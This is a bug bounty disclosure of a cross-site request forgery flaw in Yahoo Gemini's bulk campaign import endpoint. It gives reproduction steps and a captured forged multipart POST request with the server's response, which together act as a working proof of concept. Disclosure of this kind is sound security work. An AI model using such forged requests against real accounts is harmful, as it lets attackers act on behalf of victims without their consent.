Yahoo Bug Bounty #32 - Cross Site Request Forgery bulkImport Web Vulnerability

                                                The client-side vulnerability can be exploited by remote attackers with low privilege web-application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create page csrf poc 
2. The victim must login 
3. When the victim will open the page the file csv will upload and creat new Campaigns



--- PoC Session Logs [POST] ---
POST /advertiser/ajax/bulkImportCampaigns HTTP/1.1
Host: gemini.yahoo.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Access-Control-Allow-Origin: true
Referer: https://gemini.yahoo.com/advertiser/1021864/campaigns
Content-Length: 27740
Content-Type: multipart/form-data; boundary=---------------------------1423959968808241301368549351
Cookie:
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------1423959968808241301368549351
Content-Disposition: form-data; name="sourceType"
UNKNOWN
-----------------------------1423959968808241301368549351
Content-Disposition: form-data; name="file"; filename="bulkExample7.0.csv"
Content-Type: text/csv
.....
-----------------------------1423959968808241301368549351
Content-Disposition: form-data; name="advertiserId"
1021864
-----------------------------1423959968808241301368549351--

Response:
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Powered-By: Express
Vary: X-HTTP-Method-Override, Accept-Encoding
Content-Type: text/html; charset=utf-8
ETag: W/"e-20107a17"
Server: ATS
Date: Sat, 30 May 2015 13:55:43 GMT
Age: 0
Connection: keep-alive
Content-Length: 14